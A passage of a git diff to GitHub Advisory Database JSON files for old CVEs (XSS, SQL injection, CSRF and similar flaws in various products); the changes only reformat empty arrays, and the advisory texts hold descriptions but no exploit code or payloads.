Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an ELF file with a modified endianness field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m8cf-9xr4-gv54/GHSA-m8cf-9xr4-gv54.json b/advisories/unreviewed/2022/05/GHSA-m8cf-9xr4-gv54/GHSA-m8cf-9xr4-gv54.json index 6c7d10e40d9..3fa50c002ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-m8cf-9xr4-gv54/GHSA-m8cf-9xr4-gv54.json +++ b/advisories/unreviewed/2022/05/GHSA-m8cf-9xr4-gv54/GHSA-m8cf-9xr4-gv54.json @@ -7,12 +7,8 @@ "CVE-2011-5214" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM 5.100.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) modules/admin/admin_module_index.php, or (3) modules/calendar/customise_calendar_times.php; login[] parameter to (4) index.php or (5) pub/clients.php; or framed parameter to (6) licence/index.php or (7) licence/view.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m94w-hxf8-49vf/GHSA-m94w-hxf8-49vf.json b/advisories/unreviewed/2022/05/GHSA-m94w-hxf8-49vf/GHSA-m94w-hxf8-49vf.json index f912b26726a..ae4489e6871 100644 --- a/advisories/unreviewed/2022/05/GHSA-m94w-hxf8-49vf/GHSA-m94w-hxf8-49vf.json +++ b/advisories/unreviewed/2022/05/GHSA-m94w-hxf8-49vf/GHSA-m94w-hxf8-49vf.json @@ -7,12 +7,8 @@ "CVE-2012-4056" ], "details": "SQL injection vulnerability in index2.php in Uiga Personal Portal allows remote attackers to execute arbitrary SQL commands via the p parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m987-7xw4-4r9w/GHSA-m987-7xw4-4r9w.json b/advisories/unreviewed/2022/05/GHSA-m987-7xw4-4r9w/GHSA-m987-7xw4-4r9w.json index 856bef5d521..f71cf7d4b34 100644 --- a/advisories/unreviewed/2022/05/GHSA-m987-7xw4-4r9w/GHSA-m987-7xw4-4r9w.json +++ b/advisories/unreviewed/2022/05/GHSA-m987-7xw4-4r9w/GHSA-m987-7xw4-4r9w.json @@ -7,12 +7,8 @@ "CVE-2012-1110" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Etano 1.22 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user, (2) email, (3) email2, (4) f17_zip, or (5) agree parameter to join.php; (6) PATH_INFO, (7) st, (8) f17_city, (9) f17_country, (10) f17_state, (11) f17_zip, (12) f19, (13) wphoto, (14) search, or (15) v parameter to search.php; (16) PATH_INFO or (17) st parameter to photo_search.php; or (18) return parameter to photo_view.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m9gv-4c6g-8f49/GHSA-m9gv-4c6g-8f49.json b/advisories/unreviewed/2022/05/GHSA-m9gv-4c6g-8f49/GHSA-m9gv-4c6g-8f49.json index a7c9a2880e2..103f69bcb30 100644 --- a/advisories/unreviewed/2022/05/GHSA-m9gv-4c6g-8f49/GHSA-m9gv-4c6g-8f49.json +++ b/advisories/unreviewed/2022/05/GHSA-m9gv-4c6g-8f49/GHSA-m9gv-4c6g-8f49.json @@ -7,12 +7,8 @@ "CVE-2011-5206" ], "details": "Cross-site scripting (XSS) vulnerability in notes.php in Rapidleech before 2.3 rev42 SVN r399 allows remote attackers to inject arbitrary web script or HTML via the notes parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m9q5-9cgj-xcgc/GHSA-m9q5-9cgj-xcgc.json b/advisories/unreviewed/2022/05/GHSA-m9q5-9cgj-xcgc/GHSA-m9q5-9cgj-xcgc.json index 38018964993..03011c61628 100644 --- a/advisories/unreviewed/2022/05/GHSA-m9q5-9cgj-xcgc/GHSA-m9q5-9cgj-xcgc.json +++ b/advisories/unreviewed/2022/05/GHSA-m9q5-9cgj-xcgc/GHSA-m9q5-9cgj-xcgc.json @@ -7,12 +7,8 @@ "CVE-2012-2155" ], "details": "Cross-site request forgery (CSRF) vulnerability in the CDN2 Video module 6.x for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m9wp-hhqp-ww9j/GHSA-m9wp-hhqp-ww9j.json b/advisories/unreviewed/2022/05/GHSA-m9wp-hhqp-ww9j/GHSA-m9wp-hhqp-ww9j.json index 694608e10e3..0adc6b3c970 100644 --- a/advisories/unreviewed/2022/05/GHSA-m9wp-hhqp-ww9j/GHSA-m9wp-hhqp-ww9j.json +++ b/advisories/unreviewed/2022/05/GHSA-m9wp-hhqp-ww9j/GHSA-m9wp-hhqp-ww9j.json @@ -7,12 +7,8 @@ "CVE-2012-2698" ], "details": "Cross-site scripting (XSS) vulnerability in the outputPage function in includes/SkinTemplate.php in MediaWiki before 1.17.5, 1.18.x before 1.18.4, and 1.19.x before 1.19.1 allows remote attackers to inject arbitrary web script or HTML via the uselang parameter to index.php/Main_page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mc56-whq4-j9vh/GHSA-mc56-whq4-j9vh.json b/advisories/unreviewed/2022/05/GHSA-mc56-whq4-j9vh/GHSA-mc56-whq4-j9vh.json index b6ea3a461ea..8cd9efab800 100644 --- a/advisories/unreviewed/2022/05/GHSA-mc56-whq4-j9vh/GHSA-mc56-whq4-j9vh.json +++ b/advisories/unreviewed/2022/05/GHSA-mc56-whq4-j9vh/GHSA-mc56-whq4-j9vh.json @@ -7,12 +7,8 @@ "CVE-2012-2175" ], "details": "Buffer overflow in the Attachment_Times method in a certain ActiveX control in dwa85W.dll in IBM Lotus iNotes 8.5.x before 8.5.3 FP2 allows remote attackers to execute arbitrary code via a long argument.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mcjm-4hv3-7875/GHSA-mcjm-4hv3-7875.json b/advisories/unreviewed/2022/05/GHSA-mcjm-4hv3-7875/GHSA-mcjm-4hv3-7875.json index f3253eb6519..953ee60adfc 100644 --- a/advisories/unreviewed/2022/05/GHSA-mcjm-4hv3-7875/GHSA-mcjm-4hv3-7875.json +++ b/advisories/unreviewed/2022/05/GHSA-mcjm-4hv3-7875/GHSA-mcjm-4hv3-7875.json @@ -7,12 +7,8 @@ "CVE-2012-1112" ], "details": "Directory traversal vulnerability in Open-Realty CMS 2.5.8 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the select_users_template parameter to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mf82-5624-x958/GHSA-mf82-5624-x958.json b/advisories/unreviewed/2022/05/GHSA-mf82-5624-x958/GHSA-mf82-5624-x958.json index 65102ad7c95..f783c4c07ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-mf82-5624-x958/GHSA-mf82-5624-x958.json +++ b/advisories/unreviewed/2022/05/GHSA-mf82-5624-x958/GHSA-mf82-5624-x958.json @@ -7,12 +7,8 @@ "CVE-2012-3129" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, integrity, and availability, related to Gnome PDF viewer.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mfq9-x3jf-g35m/GHSA-mfq9-x3jf-g35m.json b/advisories/unreviewed/2022/05/GHSA-mfq9-x3jf-g35m/GHSA-mfq9-x3jf-g35m.json index 85cd660a4ae..ac265c11681 100644 --- a/advisories/unreviewed/2022/05/GHSA-mfq9-x3jf-g35m/GHSA-mfq9-x3jf-g35m.json +++ b/advisories/unreviewed/2022/05/GHSA-mfq9-x3jf-g35m/GHSA-mfq9-x3jf-g35m.json @@ -7,12 +7,8 @@ "CVE-2012-3724" ], "details": "CFNetwork in Apple iOS before 6 does not properly identify the host portion of a URL, which allows remote attackers to obtain sensitive information by leveraging the construction of an HTTP request with an incorrect hostname derived from a malformed URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mh6c-cqhm-4rxx/GHSA-mh6c-cqhm-4rxx.json b/advisories/unreviewed/2022/05/GHSA-mh6c-cqhm-4rxx/GHSA-mh6c-cqhm-4rxx.json index e135eeab89d..3d07d9266b7 100644 --- a/advisories/unreviewed/2022/05/GHSA-mh6c-cqhm-4rxx/GHSA-mh6c-cqhm-4rxx.json +++ b/advisories/unreviewed/2022/05/GHSA-mh6c-cqhm-4rxx/GHSA-mh6c-cqhm-4rxx.json @@ -7,12 +7,8 @@ "CVE-2012-0851" ], "details": "The ff_h264_decode_seq_parameter_set function in h264_ps.c in libavcodec in FFmpeg before 0.9.1 and in Libav 0.5.x before 0.5.9, 0.6.x before 0.6.6, 0.7.x before 0.7.6, and 0.8.x before 0.8.3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted H.264 file, related to the chroma_format_idc value.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mhh9-p6qv-qq6h/GHSA-mhh9-p6qv-qq6h.json b/advisories/unreviewed/2022/05/GHSA-mhh9-p6qv-qq6h/GHSA-mhh9-p6qv-qq6h.json index 3e860bdd0cd..6af7aa1158b 100644 --- a/advisories/unreviewed/2022/05/GHSA-mhh9-p6qv-qq6h/GHSA-mhh9-p6qv-qq6h.json +++ b/advisories/unreviewed/2022/05/GHSA-mhh9-p6qv-qq6h/GHSA-mhh9-p6qv-qq6h.json @@ -7,12 +7,8 @@ "CVE-2012-3744" ], "details": "Telephony in Apple iOS before 6 uses an SMS message's return address as the displayed sender address, which allows remote attackers to spoof text communication via a message in which the return address does not match the originating address.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mhvm-wr2g-3xfq/GHSA-mhvm-wr2g-3xfq.json b/advisories/unreviewed/2022/05/GHSA-mhvm-wr2g-3xfq/GHSA-mhvm-wr2g-3xfq.json index 3baae48ab1d..796d2c19dca 100644 --- a/advisories/unreviewed/2022/05/GHSA-mhvm-wr2g-3xfq/GHSA-mhvm-wr2g-3xfq.json +++ b/advisories/unreviewed/2022/05/GHSA-mhvm-wr2g-3xfq/GHSA-mhvm-wr2g-3xfq.json @@ -7,12 +7,8 @@ "CVE-2012-3427" ], "details": "EC2 Amazon Machine Image (AMI) in JBoss Enterprise Application Platform (EAP) 5.1.2 uses 755 permissions for /var/cache/jboss-ec2-eap/, which allows local users to read sensitive information such as Amazon Web Services (AWS) credentials by reading files in the directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mhxc-qp4v-2gf3/GHSA-mhxc-qp4v-2gf3.json b/advisories/unreviewed/2022/05/GHSA-mhxc-qp4v-2gf3/GHSA-mhxc-qp4v-2gf3.json index e944380470b..0d41bc01a9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-mhxc-qp4v-2gf3/GHSA-mhxc-qp4v-2gf3.json +++ b/advisories/unreviewed/2022/05/GHSA-mhxc-qp4v-2gf3/GHSA-mhxc-qp4v-2gf3.json @@ -7,12 +7,8 @@ "CVE-2012-1834" ], "details": "Cross-site scripting (XSS) vulnerability in the cms_tpv_admin_head function in functions.php in the CMS Tree Page View plugin before 0.8.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cms_tpv_view parameter to wp-admin/options-general.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mjmj-78h5-2728/GHSA-mjmj-78h5-2728.json b/advisories/unreviewed/2022/05/GHSA-mjmj-78h5-2728/GHSA-mjmj-78h5-2728.json index 09ee76e00c3..d527e554354 100644 --- a/advisories/unreviewed/2022/05/GHSA-mjmj-78h5-2728/GHSA-mjmj-78h5-2728.json +++ b/advisories/unreviewed/2022/05/GHSA-mjmj-78h5-2728/GHSA-mjmj-78h5-2728.json @@ -7,12 +7,8 @@ "CVE-2012-2704" ], "details": "The Advertisement module 6.x-2.x before 6.x-2.3 for Drupal does not properly restrict access to debug information, which allows remote attackers to obtain sensitive site configuration information that is specified by the $conf variable in settings.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mm8c-8p6q-jgq6/GHSA-mm8c-8p6q-jgq6.json b/advisories/unreviewed/2022/05/GHSA-mm8c-8p6q-jgq6/GHSA-mm8c-8p6q-jgq6.json index 7d1ca1639ce..259f7f35ec7 100644 --- a/advisories/unreviewed/2022/05/GHSA-mm8c-8p6q-jgq6/GHSA-mm8c-8p6q-jgq6.json +++ b/advisories/unreviewed/2022/05/GHSA-mm8c-8p6q-jgq6/GHSA-mm8c-8p6q-jgq6.json @@ -7,12 +7,8 @@ "CVE-2012-3537" ], "details": "The Crowbar Ohai plugin (chef/cookbooks/ohai/files/default/plugins/crowbar.rb) in the Deployer Barclamp in Crowbar, possibly 1.4 and earlier, allows local users to execute arbitrary shell commands via vectors related to \"insecure handling of tmp files\" and predictable file names.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mmg5-p8mc-485h/GHSA-mmg5-p8mc-485h.json b/advisories/unreviewed/2022/05/GHSA-mmg5-p8mc-485h/GHSA-mmg5-p8mc-485h.json index f1c0952a213..8ad51acbdee 100644 --- a/advisories/unreviewed/2022/05/GHSA-mmg5-p8mc-485h/GHSA-mmg5-p8mc-485h.json +++ b/advisories/unreviewed/2022/05/GHSA-mmg5-p8mc-485h/GHSA-mmg5-p8mc-485h.json @@ -7,12 +7,8 @@ "CVE-2012-1294" ], "details": "SQL injection vulnerability in CONTIMEX Impulsio CMS allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mpp4-w5xw-8xhc/GHSA-mpp4-w5xw-8xhc.json b/advisories/unreviewed/2022/05/GHSA-mpp4-w5xw-8xhc/GHSA-mpp4-w5xw-8xhc.json index cea464ca47b..3c7e64ad8fa 100644 --- a/advisories/unreviewed/2022/05/GHSA-mpp4-w5xw-8xhc/GHSA-mpp4-w5xw-8xhc.json +++ b/advisories/unreviewed/2022/05/GHSA-mpp4-w5xw-8xhc/GHSA-mpp4-w5xw-8xhc.json @@ -7,12 +7,8 @@ "CVE-2012-1736" ], "details": "Unspecified vulnerability in the Oracle MapViewer component in Oracle Fusion Middleware 10.1.3.1 allows remote attackers to affect confidentiality via unknown vectors related to Oracle Maps.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mq7j-cf25-xgvv/GHSA-mq7j-cf25-xgvv.json b/advisories/unreviewed/2022/05/GHSA-mq7j-cf25-xgvv/GHSA-mq7j-cf25-xgvv.json index a7322a18353..a08987489c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-mq7j-cf25-xgvv/GHSA-mq7j-cf25-xgvv.json +++ b/advisories/unreviewed/2022/05/GHSA-mq7j-cf25-xgvv/GHSA-mq7j-cf25-xgvv.json @@ -7,12 +7,8 @@ "CVE-2012-1058" ], "details": "Cross-site request forgery (CSRF) vulnerability in Flyspray 0.9.9.6 allows remote attackers to hijack the authentication of admins for requests that add admin accounts via an admin.newuser action to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mqjr-4xvc-hm4g/GHSA-mqjr-4xvc-hm4g.json b/advisories/unreviewed/2022/05/GHSA-mqjr-4xvc-hm4g/GHSA-mqjr-4xvc-hm4g.json index 134db7ff7eb..0ca40e72c42 100644 --- a/advisories/unreviewed/2022/05/GHSA-mqjr-4xvc-hm4g/GHSA-mqjr-4xvc-hm4g.json +++ b/advisories/unreviewed/2022/05/GHSA-mqjr-4xvc-hm4g/GHSA-mqjr-4xvc-hm4g.json @@ -7,12 +7,8 @@ "CVE-2012-4034" ], "details": "Multiple SQL injection vulnerabilities in PBBoard 2.1.4 allow remote attackers to execute arbitrary SQL commands via the (1) username parameter to the send page, (2) email parameter to the forget page, (3) password parameter to the forum_archive page, (4) section parameter to the management page, (5) section_id parameter to the managementreply page, (6) member_id parameter to the new_password page, or (7) subjectid parameter to the tags page to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mqr5-ffq5-hrp4/GHSA-mqr5-ffq5-hrp4.json b/advisories/unreviewed/2022/05/GHSA-mqr5-ffq5-hrp4/GHSA-mqr5-ffq5-hrp4.json index 555841a3d04..89a4d696845 100644 --- a/advisories/unreviewed/2022/05/GHSA-mqr5-ffq5-hrp4/GHSA-mqr5-ffq5-hrp4.json +++ b/advisories/unreviewed/2022/05/GHSA-mqr5-ffq5-hrp4/GHSA-mqr5-ffq5-hrp4.json @@ -7,12 +7,8 @@ "CVE-2012-2024" ], "details": "Adobe Illustrator before CS6 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0780, CVE-2012-2023, CVE-2012-2025, and CVE-2012-2026.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mv4c-6fpc-r32q/GHSA-mv4c-6fpc-r32q.json b/advisories/unreviewed/2022/05/GHSA-mv4c-6fpc-r32q/GHSA-mv4c-6fpc-r32q.json index 29327c9a55b..d11a3b3287d 100644 --- a/advisories/unreviewed/2022/05/GHSA-mv4c-6fpc-r32q/GHSA-mv4c-6fpc-r32q.json +++ b/advisories/unreviewed/2022/05/GHSA-mv4c-6fpc-r32q/GHSA-mv4c-6fpc-r32q.json @@ -7,12 +7,8 @@ "CVE-2012-0862" ], "details": "builtins.c in Xinetd before 2.3.15 does not check the service type when the tcpmux-server service is enabled, which exposes all enabled services and allows remote attackers to bypass intended access restrictions via a request to tcpmux port 1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mvf6-4p6h-52hv/GHSA-mvf6-4p6h-52hv.json b/advisories/unreviewed/2022/05/GHSA-mvf6-4p6h-52hv/GHSA-mvf6-4p6h-52hv.json index acf1d378aa2..903084901a6 100644 --- a/advisories/unreviewed/2022/05/GHSA-mvf6-4p6h-52hv/GHSA-mvf6-4p6h-52hv.json +++ b/advisories/unreviewed/2022/05/GHSA-mvf6-4p6h-52hv/GHSA-mvf6-4p6h-52hv.json @@ -7,12 +7,8 @@ "CVE-2012-3088" ], "details": "Cisco AnyConnect Secure Mobility Client 3.1.x before 3.1.00495, and 3.2.x, does not check whether an HTTP request originally contains ScanSafe headers, which allows remote attackers to have an unspecified impact via a crafted request, aka Bug ID CSCua13166.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mw8x-7c7c-76qf/GHSA-mw8x-7c7c-76qf.json b/advisories/unreviewed/2022/05/GHSA-mw8x-7c7c-76qf/GHSA-mw8x-7c7c-76qf.json index ac7bb74369b..12a8be0cb75 100644 --- a/advisories/unreviewed/2022/05/GHSA-mw8x-7c7c-76qf/GHSA-mw8x-7c7c-76qf.json +++ b/advisories/unreviewed/2022/05/GHSA-mw8x-7c7c-76qf/GHSA-mw8x-7c7c-76qf.json @@ -7,12 +7,8 @@ "CVE-2012-1753" ], "details": "Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to PC.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mwg8-2j37-h8hh/GHSA-mwg8-2j37-h8hh.json b/advisories/unreviewed/2022/05/GHSA-mwg8-2j37-h8hh/GHSA-mwg8-2j37-h8hh.json index 99f6d02f5f5..af36584e7a3 100644 --- a/advisories/unreviewed/2022/05/GHSA-mwg8-2j37-h8hh/GHSA-mwg8-2j37-h8hh.json +++ b/advisories/unreviewed/2022/05/GHSA-mwg8-2j37-h8hh/GHSA-mwg8-2j37-h8hh.json @@ -7,12 +7,8 @@ "CVE-2012-1427" ], "details": "The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Norman Antivirus 6.06.12, and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via a POSIX TAR file with a \\57\\69\\6E\\5A\\69\\70 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mxx5-2h9x-347v/GHSA-mxx5-2h9x-347v.json b/advisories/unreviewed/2022/05/GHSA-mxx5-2h9x-347v/GHSA-mxx5-2h9x-347v.json index 2a4e31c254a..0bb0c952458 100644 --- a/advisories/unreviewed/2022/05/GHSA-mxx5-2h9x-347v/GHSA-mxx5-2h9x-347v.json +++ b/advisories/unreviewed/2022/05/GHSA-mxx5-2h9x-347v/GHSA-mxx5-2h9x-347v.json @@ -7,12 +7,8 @@ "CVE-2012-2938" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Travelon Express 6.2.2 allow remote attackers to inject arbitrary web script or HTML via the holiday name field to (1) holiday_add.php or (2) holiday_view.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p6qx-67x2-357p/GHSA-p6qx-67x2-357p.json b/advisories/unreviewed/2022/05/GHSA-p6qx-67x2-357p/GHSA-p6qx-67x2-357p.json index 4c0ce2380f4..72c0f7a5437 100644 --- a/advisories/unreviewed/2022/05/GHSA-p6qx-67x2-357p/GHSA-p6qx-67x2-357p.json +++ b/advisories/unreviewed/2022/05/GHSA-p6qx-67x2-357p/GHSA-p6qx-67x2-357p.json @@ -7,12 +7,8 @@ "CVE-2012-1289" ], "details": "Multiple directory traversal vulnerabilities in SAP NetWeaver 7.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the logfilename parameter to (1) b2b/admin/log.jsp or (2) b2b/admin/log_view.jsp in the Internet Sales (crm.b2b) component, or (3) ipc/admin/log.jsp or (4) ipc/admin/log_view.jsp in the Application Administration (com.sap.ipc.webapp.ipc) component.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p73h-2mgq-7mwp/GHSA-p73h-2mgq-7mwp.json b/advisories/unreviewed/2022/05/GHSA-p73h-2mgq-7mwp/GHSA-p73h-2mgq-7mwp.json index 4fab84d8a8f..414fdb7bee9 100644 --- a/advisories/unreviewed/2022/05/GHSA-p73h-2mgq-7mwp/GHSA-p73h-2mgq-7mwp.json +++ b/advisories/unreviewed/2022/05/GHSA-p73h-2mgq-7mwp/GHSA-p73h-2mgq-7mwp.json @@ -7,12 +7,8 @@ "CVE-2012-3293" ], "details": "Cross-site scripting (XSS) vulnerability in the Administrative Console in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.4, and 8.5.x before 8.5.0.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving FRAME elements, related to a cross-frame scripting (XFS) issue.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p79r-m85f-v88m/GHSA-p79r-m85f-v88m.json b/advisories/unreviewed/2022/05/GHSA-p79r-m85f-v88m/GHSA-p79r-m85f-v88m.json index 4d889c497a2..2067fda4b64 100644 --- a/advisories/unreviewed/2022/05/GHSA-p79r-m85f-v88m/GHSA-p79r-m85f-v88m.json +++ b/advisories/unreviewed/2022/05/GHSA-p79r-m85f-v88m/GHSA-p79r-m85f-v88m.json @@ -7,12 +7,8 @@ "CVE-2012-1068" ], "details": "Cross-site scripting (XSS) vulnerability in the rc_ajax function in core.php in the WP-RecentComments plugin before 2.0.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter, related to AJAX paging.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p7w3-qmp3-fc84/GHSA-p7w3-qmp3-fc84.json b/advisories/unreviewed/2022/05/GHSA-p7w3-qmp3-fc84/GHSA-p7w3-qmp3-fc84.json index f9c23e6e90f..ac57c0990fd 100644 --- a/advisories/unreviewed/2022/05/GHSA-p7w3-qmp3-fc84/GHSA-p7w3-qmp3-fc84.json +++ b/advisories/unreviewed/2022/05/GHSA-p7w3-qmp3-fc84/GHSA-p7w3-qmp3-fc84.json @@ -7,12 +7,8 @@ "CVE-2012-1416" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in SocialCMS 1.0.2 allow remote attackers to hijack the authentication of administrators for requests that (1) add administrator accounts via a member_new action to my_admin/admin1_members.php or (2) modify the default site title via a save action to my_admin/admin1_configuration.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p84q-fgj5-q47p/GHSA-p84q-fgj5-q47p.json b/advisories/unreviewed/2022/05/GHSA-p84q-fgj5-q47p/GHSA-p84q-fgj5-q47p.json index 1929d77d0ad..9e5a895644e 100644 --- a/advisories/unreviewed/2022/05/GHSA-p84q-fgj5-q47p/GHSA-p84q-fgj5-q47p.json +++ b/advisories/unreviewed/2022/05/GHSA-p84q-fgj5-q47p/GHSA-p84q-fgj5-q47p.json @@ -7,12 +7,8 @@ "CVE-2012-2690" ], "details": "virt-edit in libguestfs before 1.18.0 does not preserve the permissions from the original file and saves the new file with world-readable permissions when editing, which might allow local guest users to obtain sensitive information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + 